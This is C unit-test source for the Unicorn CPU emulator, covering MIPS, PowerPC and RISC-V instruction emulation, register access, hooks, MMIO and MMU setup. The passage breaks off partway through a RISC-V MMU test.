#include "unicorn_test.h" const uint64_t code_start = 0x10000000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_mips_el_ori(void) { uc_engine *uc; char code[] = "\x56\x34\x21\x34"; // ori $at, $at, 0x3456; int r_r1 = 0x6789; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_MIPS_REG_1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_1, &r_r1)); TEST_CHECK(r_r1 == 0x77df); OK(uc_close(uc)); } static void test_mips_eb_ori(void) { uc_engine *uc; char code[] = "\x34\x21\x34\x56"; // ori $at, $at, 0x3456; int r_r1 = 0x6789; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_MIPS_REG_1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_1, &r_r1)); TEST_CHECK(r_r1 == 0x77df); OK(uc_close(uc)); } static void test_mips_stop_at_branch(void) { uc_engine *uc; char code[] = "\x02\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"; // j 0x8; nop; int r_pc = 0x0; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); // Execute one instruction with branch delay slot. OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 1)); OK(uc_reg_read(uc, UC_MIPS_REG_PC, &r_pc)); // Even though we execute only one instruction, the instruction in the // delay slot is also executed.
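// (j 0x8 encodes instr_index 2, so the target is (PC & 0xF0000000) | (2 << 2) == code_start + 0x8.)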
TEST_CHECK(r_pc == code_start + 0x8); OK(uc_close(uc)); } static void test_mips_stop_at_delay_slot(void) { uc_engine *uc; char code[] = "\x02\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"; // j 0x8; nop; int r_pc = 0x0; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); // Stop at the delay slot by design. OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_PC, &r_pc)); // The branch instruction isn't committed and the PC is not updated. // The user is responsible for restarting emulation at the branch instruction. TEST_CHECK(r_pc == code_start); OK(uc_close(uc)); } static void test_mips_lwx_exception_issue_1314(void) { uc_engine *uc; char code[] = "\x0a\xc8\x79\x7e"; // lwx $t9, $t9($s3) int reg; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x10000, 0x4000, UC_PROT_ALL)); // Enable DSP // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00090-2B-MIPS32PRA-AFP-06.02.pdf OK(uc_reg_read(uc, UC_MIPS_REG_CP0_STATUS, &reg)); reg |= (1 << 24); OK(uc_reg_write(uc, UC_MIPS_REG_CP0_STATUS, &reg)); reg = 0; OK(uc_reg_write(uc, UC_MIPS_REG_1, &reg)); OK(uc_reg_write(uc, UC_MIPS_REG_T9, &reg)); reg = LEINT32(0xdeadbeef); OK(uc_mem_write(uc, 0x10000, &reg, 4)); reg = 0x10000; OK(uc_reg_write(uc, UC_MIPS_REG_S3, &reg)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_T9, &reg)); TEST_CHECK(reg == 0xdeadbeef); OK(uc_close(uc)); } TEST_LIST = { {"test_mips_stop_at_branch", test_mips_stop_at_branch}, {"test_mips_stop_at_delay_slot", test_mips_stop_at_delay_slot}, {"test_mips_el_ori", test_mips_el_ori}, {"test_mips_eb_ori", test_mips_eb_ori}, {"test_mips_lwx_exception_issue_1314", test_mips_lwx_exception_issue_1314}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_ppc.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_ppc32_add(void) { uc_engine *uc; char code[] = "\x7f\x46\x1a\x14"; // ADD 26, 6, 3 int reg; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); reg = 42; OK(uc_reg_write(uc, UC_PPC_REG_3, &reg)); reg = 1337; OK(uc_reg_write(uc, UC_PPC_REG_6, &reg)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_26, &reg)); TEST_CHECK(reg == 1379); OK(uc_close(uc)); } // https://www.ibm.com/docs/en/aix/7.2?topic=set-fadd-fa-floating-add-instruction static void test_ppc32_fadd(void) { uc_engine *uc; char code[] = "\xfc\xc4\x28\x2a"; // fadd 6, 4, 5 uint32_t r_msr; uint64_t r_fpr4, r_fpr5, r_fpr6; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_read(uc, UC_PPC_REG_MSR,
&r_msr)); r_msr |= (1 << 13); // enable FP (MSR bit 0x2000 is the FP-available bit) OK(uc_reg_write(uc, UC_PPC_REG_MSR, &r_msr)); r_fpr4 = 0xC053400000000000ul; r_fpr5 = 0x400C000000000000ul; OK(uc_reg_write(uc, UC_PPC_REG_FPR4, &r_fpr4)); OK(uc_reg_write(uc, UC_PPC_REG_FPR5, &r_fpr5)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_FPR6, &r_fpr6)); TEST_CHECK(r_fpr6 == 0xC052600000000000ul); OK(uc_close(uc)); } static void test_ppc32_sc_cb(uc_engine *uc, uint32_t intno, void *data) { uc_emu_stop(uc); return; } static void test_ppc32_sc(void) { uc_engine *uc; char code[] = "\x44\x00\x00\x02"; // sc uint32_t r_pc; uc_hook h; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INTR, test_ppc32_sc_cb, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_PC, &r_pc)); TEST_CHECK(r_pc == code_start + 4); OK(uc_close(uc)); } static void test_ppc32_cr(void) { uc_engine *uc; uint32_t r_cr = 0x12345678; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, NULL, 0); OK(uc_reg_write(uc, UC_PPC_REG_CR, &r_cr)); r_cr = 0; OK(uc_reg_read(uc, UC_PPC_REG_CR, &r_cr)); TEST_CHECK(r_cr == 0x12345678); OK(uc_close(uc)); } static void test_ppc32_spr_time(void) { char code[] = ("\x7c\x76\x02\xa6" // mfspr r3, DEC "\x7c\x6d\x42\xa6" // mfspr r3, TBUr ); uc_engine *uc; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_ppc32_add", test_ppc32_add}, {"test_ppc32_fadd", test_ppc32_fadd}, {"test_ppc32_sc", test_ppc32_sc}, {"test_ppc32_cr", test_ppc32_cr}, {"test_ppc32_spr_time", test_ppc32_spr_time}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_riscv.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_riscv32_nop(void) { uc_engine *uc; char code[] = "\x13\x00\x00\x00"; // nop uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x5678; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); TEST_CHECK(r_t0 == 0x1234); TEST_CHECK(r_t1 == 0x5678); OK(uc_close(uc)); } static void test_riscv64_nop(void) { uc_engine *uc; char code[] = "\x13\x00\x00\x00"; // nop uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x5678; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code)
- 1); OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); TEST_CHECK(r_t0 == 0x1234); TEST_CHECK(r_t1 == 0x5678); OK(uc_close(uc)); } static void test_riscv32_until_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x7890; uint32_t r_pc = 0x0000; uint32_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv64_until_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x7890; uint64_t r_pc = 0x0000; uint64_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv32_3steps_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x7890; uint32_t r_pc = 0x0000; uint32_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, -1, 0, 3)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv64_3steps_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x7890; uint64_t r_pc = 0x0000; uint64_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, 
code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, -1, 0, 3)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv32_fp_move(void) { uc_engine *uc; char code[] = "\xd3\x81\x10\x22"; // fmv.d f3, f1 uint64_t r_f1 = 0x123456781a2b3c4dULL; uint64_t r_f3 = 0x56780246aaaabbbbULL; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_F1, &r_f1); uc_reg_write(uc, UC_RISCV_REG_F3, &r_f3); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_read(uc, UC_RISCV_REG_F3, &r_f3)); TEST_CHECK(r_f1 == 0x123456781a2b3c4dULL); TEST_CHECK(r_f3 == 0x123456781a2b3c4dULL); uc_close(uc); } static void test_riscv64_fp_move(void) { uc_engine *uc; char code[] = "\xd3\x81\x10\x22"; // fmv.d f3, f1 uint64_t r_f1 = 0x123456781a2b3c4dULL; uint64_t r_f3 = 0x56780246aaaabbbbULL; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_write(uc, UC_RISCV_REG_F3, &r_f3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_read(uc, UC_RISCV_REG_F3, &r_f3)); TEST_CHECK(r_f1 == 0x123456781a2b3c4dULL); TEST_CHECK(r_f3 == 0x123456781a2b3c4dULL); uc_close(uc); } static void test_riscv64_fp_move_from_int(void) { uc_engine *uc; // https://riscv.org/wp-content/uploads/2017/05/riscv-spec-v2.2.pdf // https://five-embeddev.com/quickref/csrs.html // We have to enable mstatus.fs char code[] = "\xf3\x90\x01\x30\x53\x00\x0b\xf2"; // csrrw x2, mstatus, x3; // fmv.d.x ft0, s6 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_x3 = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_X3, &r_x3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 2)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x56785678); TEST_CHECK(r_s6 == 0x56785678); uc_close(uc); } static void test_riscv64_fp_move_from_int_reg_write(void) { uc_engine *uc; char code[] = "\x53\x00\x0b\xf2"; // fmv.d.x ft0, s6 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_mstatus = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_MSTATUS, &r_mstatus)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x56785678); TEST_CHECK(r_s6 == 0x56785678); OK(uc_close(uc)); } static void
test_riscv64_fp_move_to_int(void) { uc_engine *uc; // https://riscv.org/wp-content/uploads/2017/05/riscv-spec-v2.2.pdf // https://five-embeddev.com/quickref/csrs.html // We have to enable mstatus.fs char code[] = "\xf3\x90\x01\x30\x53\x0b\x00\xe2"; // csrrw x2, mstatus, x3; // fmv.x.d s6, ft0 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_x3 = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_X3, &r_x3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 2)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x12341234); TEST_CHECK(r_s6 == 0x12341234); uc_close(uc); } static void test_riscv64_code_patching(void) { uc_engine *uc; char code[] = "\x93\x82\x12\x00"; // addi t0, t0, 0x1 uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // Zero out t0 uint64_t r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); // emulate the instruction OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 == 0x1); // patch instruction char patch_code[] = "\x93\x82\xf2\x7f"; // addi t0, t0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); // zero out t0 r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(patch_code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 != 0x1); TEST_CHECK(r_t0 == 0x7ff); OK(uc_close(uc)); } // Need to flush the cache before running the emulation after patching static void test_riscv64_code_patching_count(void) { uc_engine *uc; char code[] = "\x93\x82\x12\x00"; // addi t0, t0, 0x1 uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // Zero out t0 uint64_t r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 == 0x1); // patch instruction char patch_code[] = "\x93\x82\xf2\x7f"; // addi t0, t0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); OK(uc_ctl_remove_cache(uc, code_start, code_start + sizeof(patch_code) - 1)); // zero out t0 r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 != 0x1); TEST_CHECK(r_t0 == 0x7ff); OK(uc_close(uc)); } static void test_riscv64_ecall_cb(uc_engine *uc, uint32_t intno, void *data) { uc_emu_stop(uc); return; } static void test_riscv64_ecall(void) { uc_engine *uc; char code[] = "\x73\x00\x00\x00"; // ecall uint64_t r_pc; uc_hook h; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INTR, test_riscv64_ecall_cb, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_pc == code_start + 4); OK(uc_close(uc)); } static uint64_t test_riscv32_mmio_map_read_cb(uc_engine *uc, uint64_t offset, unsigned size, void *data) { int r_a4; OK(uc_reg_read(uc, UC_RISCV_REG_A4, &r_a4)); TEST_CHECK(r_a4 == 0x40021 << 12); TEST_CHECK(offset ==
0x21018); return 0; } static void test_riscv32_mmio_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_mmio_map(uc, 0x40000000, 0x40000, test_riscv32_mmio_map_read_cb, NULL, NULL, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_riscv32_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uint64_t val = 0xdeadbeef; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x40000000, 0x40000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x40000000 + 0x21018, &val, 8)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_A5, &val)); TEST_CHECK(val == 0xdeadbeef); OK(uc_close(uc)); } static uint64_t test_riscv64_mmio_map_read_cb(uc_engine *uc, uint64_t offset, unsigned size, void *data) { uint64_t r_a4; OK(uc_reg_read(uc, UC_RISCV_REG_A4, &r_a4)); TEST_CHECK(r_a4 == 0x40021 << 12); TEST_CHECK(offset == 0x21018); return 0; } static void test_riscv64_mmio_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_mmio_map(uc, 0x40000000, 0x40000, test_riscv64_mmio_map_read_cb, NULL, NULL, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static bool test_riscv_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_riscv_correct_address_in_small_jump_hook(void) { uc_engine *uc; // li 0x7F00, x5 > lui t0, 8; addiw t0, t0, -256; // jr x5 char code[] = "\xb7\x82\x00\x00\x9b\x82\x02\xf0\x67\x80\x02\x00"; uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_riscv_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); OK(uc_close(uc)); } static bool test_riscv_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_riscv_correct_address_in_long_jump_hook(void) { uc_engine *uc; // li 0x7FFFFFFFFFFFFF00, x5 > addi t0, zero, -1; slli t0, t0, 63; addi // t0, t0, -256; jr x5 char code[] = 
"\x93\x02\xf0\xff\x93\x92\xf2\x03\x93\x82\x02\xf0\x67\x80\x02\x00"; uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_riscv_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_riscv_mmu_prepare_tlb(uc_engine *uc, uint32_t data_address, uint32_t code_address) { uint64_t tlbe; uint32_t sptbr = 0x2000; OK(uc_mem_map(uc, sptbr, 0x3000, UC_PROT_ALL)); // tlb base tlbe = ((sptbr + 0x1000) >> 2) | 1; OK(uc_mem_write(uc, sptbr, &tlbe, sizeof(tlbe))); tlbe = ((sptbr + 0x2000) >> 2) | 1; OK(uc_mem_write(uc, sptbr + 0x1000, &tlbe, sizeof(tlbe))); tlbe = (code_address >> 2) | (7 << 1) | 1; OK(uc_mem_write(uc, sptbr + 0x2000 + 0x15 * 8, &tlbe, sizeof(tlbe))); tlbe = (data_address >> 2) | (7 << 1) | 1; OK(uc_mem_write(uc, sptbr + 0x2000 + 0x16 * 8, &tlbe, sizeof(tlbe))); } static void test_riscv_mmu_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *userdata) { if (address == 0x15010) { OK(uc_emu_stop(uc)); } } static void test_riscv_mmu(void) { uc_engine *uc; uc_hook h; uint32_t code_address = 0x5000; uint32_t data_address = 0x6000; uint32_t data_value = 0x41414141; uint32_t data_result = 0; /* li t3, (8 << 60) | 2 csrw sptbr, t3 li t0, (1 << 11) | (1 << 5) csrw mstatus, t0 la t1, 0x15000 csrw mepc, t1 mret */ char code_m[] = "\x1b\x0e\xf0\xff" "\x13\x1e\xfe\x03" "\x13\x0e\x2e\x00" "\x73\x10\x0e\x18" "\xb7\x12\x00\x00" "\x9b\x82\x02\x82" "\x73\x90\x02\x30" "\x37\x53\x01\x00" "\x73\x10\x13\x34" "\x73\x00\x20\x30"; /* li t0, 0x41414141 